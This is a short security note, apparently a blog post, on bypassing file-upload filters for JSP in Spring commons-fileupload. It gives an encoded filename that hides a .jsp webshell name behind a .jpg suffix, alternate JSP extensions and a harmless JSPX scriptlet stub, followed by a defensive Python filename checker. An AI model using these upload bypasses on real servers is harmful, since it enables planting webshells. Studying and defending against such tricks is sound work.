
JSP Upload Bypass

awakerrday 2020. 9. 1. 19:44

Spring commons-fileupload.jar WAF filtering Bypass

=?UTF8?B?c29tZV93ZWJzaGVsbC5qc3A=?=.jpg

https://ar9ang3.tistory.com/m/56?category=754757

https://enki.co.kr/blog/2020/02/27/cce_writeup.html?fbclid=IwAR0ztC_wshd_DHvIA-HBMh_F99TdqkPiqyGyBu_WfP6Id-2TPTPPp_uPkZY

 

 

- .jsv, .jsw (IBM server)

- .jspx

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml"
 xmlns:c="http://java.sun.com/jsp/jstl/core" version="2.0">
<jsp:directive.page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.io.*"/>
<!-- In XML (JSPX) syntax the scriptlet body is plain Java, without the classic JSP scriptlet delimiters -->
<jsp:scriptlet><![CDATA[
	out.println("TEST!!");
]]>
</jsp:scriptlet>
</jsp:root>
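
The encoded filename at the top of this post is an RFC 2047 encoded-word whose Base64 payload decodes to some_webshell.jsp, so a filter that reads only the raw name sees a .jpg. The upload-name check below is an added example, not code from the original post or from commons-fileupload; the image-only allowlist and all function names are assumptions.

```python
import base64
import binascii
import re

# RFC 2047 encoded-word: =?charset?B|Q?payload?=
ENCODED_WORD = re.compile(r"=\?([^?\s]+)\?([bBqQ])\?([^?\s]*)\?=")
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}      # assumption: image-only upload endpoint
SERVER_SIDE_EXT = {"jsp", "jspx", "jsv", "jsw"}  # extensions named in this post


def _decode_word(match):
    charset, encoding, payload = match.group(1), match.group(2).upper(), match.group(3)
    try:
        if encoding == "B":
            raw = base64.b64decode(payload, validate=True)
        else:
            raw = binascii.a2b_qp(payload, header=True)
        return raw.decode(charset)
    except (ValueError, LookupError):  # bad Base64, bad bytes, unknown charset
        return match.group(0)          # leave undecodable words untouched


def _extensions(name):
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return [part.lower() for part in base.split(".")[1:]]


def naive_extension_check(filename):
    """What a raw-name filter does: look only at the last extension."""
    exts = _extensions(filename)
    return bool(exts) and exts[-1] in ALLOWED_EXT


def check_upload_name(filename):
    """Return (accepted, decoded_name, reasons) after normalising the name."""
    decoded = ENCODED_WORD.sub(_decode_word, filename)
    reasons = []
    if ENCODED_WORD.search(filename):
        reasons.append("encoded-word in filename")
    for name in (filename, decoded):  # check the raw and the decoded form
        hits = sorted(SERVER_SIDE_EXT.intersection(_extensions(name)))
        if hits:
            reasons.append("server-side extension: ." + ", .".join(hits))
            break
    if not naive_extension_check(decoded):
        reasons.append("final extension not in allowlist")
    return (not reasons, decoded, reasons)


SAMPLE = "=?UTF8?B?c29tZV93ZWJzaGVsbC5qc3A=?=.jpg"  # filename from this post
```

Storing uploads under a server-generated name outside the web root removes the dependency on the client-supplied name altogether; this check is a second layer, not a replacement for that.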

 
